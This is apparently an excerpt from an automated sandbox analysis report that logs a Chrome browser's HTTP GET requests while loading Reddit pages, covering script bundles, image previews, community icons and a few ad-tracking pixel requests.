Source: global trafficHTTP traffic detected: GET /shreddit/en-US/zoomable-img-d1a4d4d2.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/media-lightbox-client-js-976ccbbe.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/validate-image-fc8b467a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/search-input-desktop-client-js-cb5b0267.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/text-input-1c750feb.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/search-input-desktop-client-js-cb5b0267.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/index-169ed00b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/search-input-desktop-client-js-cb5b0267.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/filterNullish-3e68f24c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/search-input-desktop-client-js-cb5b0267.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/helpful_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/community-card-aba01d4b.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/compact-post-community-recommendations-client-js-8648402c.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/show-more-grid-51791b3c.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/compact-post-community-recommendations-client-js-8648402c.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-switch-input-14302c35.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-translation-button-client-js-d88f0399.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/faceplate-textarea-input-ab5075d8.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-translation-button-client-js-d88f0399.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/translation-8ca07c16.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-translation-button-client-js-d88f0399.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/helpers-ca93cf1a.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/hui-translation-button-client-js-d88f0399.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-luhi4fjr1bwe1.jpg?width=640&crop=smart&auto=webp&s=3e26cbabdd244446c273c73a03bace63100eae06 HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /91jo67p59m201_t5_2qh1i/cicada HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/helpful_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/pdp-back-button-308ac1d1.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/header-large-client-js-8583a096.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-interactable-element-9eb68123.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/deprecated-content-client-js-d6b00feb.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /472486.gif HTTP/1.1Host: id.rlcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/xpromo-c45d37b6.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/deprecated-content-client-js-d6b00feb.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/shreddit-coachmark-trigger-2a03d032.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/emoji-template-table-client-js-bd12eb08.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/rpl-hovercard-afe2140e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3vnbmz4nv8we1.jpg?width=216&crop=smart&auto=webp&s=dbefa11bd4d3481aabc576079e4c0b52e79daa6f HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftc-sues-uber-says-company-charged-for-uber-one-without-v0-kT9Nhal_HQQtxcf8eKVARRPtoPlbH4aoXVXOXSUDNQo.jpg?width=320&crop=smart&auto=webp&s=6338bef17fddca5ee8ebe463223bc1a65ec595e1 HTTP/1.1Host: external-preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /J_fCwTYJkoM-way-eaOHv8AOHoF_jNXNqOvPrQ7bINY.png HTTP/1.1Host: b.thumbs.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2rau9/styles/communityIcon_skrngvy47ymd1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=241e2e43767a350a2ed38dea24d6e1aa97b49388 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2qh1i/styles/communityIcon_p6kb2m6b185b1.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=5feb83c069804a8d8525e9cd17d68958c3d57088 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aio-for-demanding-to-be-paid-after-wearing-something-v0-luhi4fjr1bwe1.jpg?width=640&crop=smart&auto=webp&s=3e26cbabdd244446c273c73a03bace63100eae06 HTTP/1.1Host: preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_4uoy2u/styles/communityIcon_l4hwets9e0cd1.jpg?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=df34b22282abcd744996c325825697b55245c3a9 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/hovercard.base-1e594a4d.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/qr-code-persistent-button-upsell-client-js-514ab4ef.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /91jo67p59m201_t5_2qh1i/cicada HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-topic-tracker-bdb15252.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-topics-section-client-js-c3c87bfd.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1000.gif?memo=CKbrHBoNCJOwn8AGEgUI6AcQAEIASgA HTTP/1.1Host: id.rlcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: rlas3=Mui1gqv7W+BWUbLFjAF5U0IDc/7jX22FO33OhwNTuxU=; pxrc=CAA=
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/select-controller-fa3db659.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/left-nav-top-section-7736257e.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/reddit-sidebar-nav-28dd3865.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /policy HTTP/1.1Host: w3-reporting.reddit.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.reddit.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shreddit/en-US/guides-entrypoint-tooltip-5b8e1fc8.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveOrigin: https://www.reddit.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.redditstatic.com/shreddit/en-US/left-nav-client-js-957bb8c9.jsAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
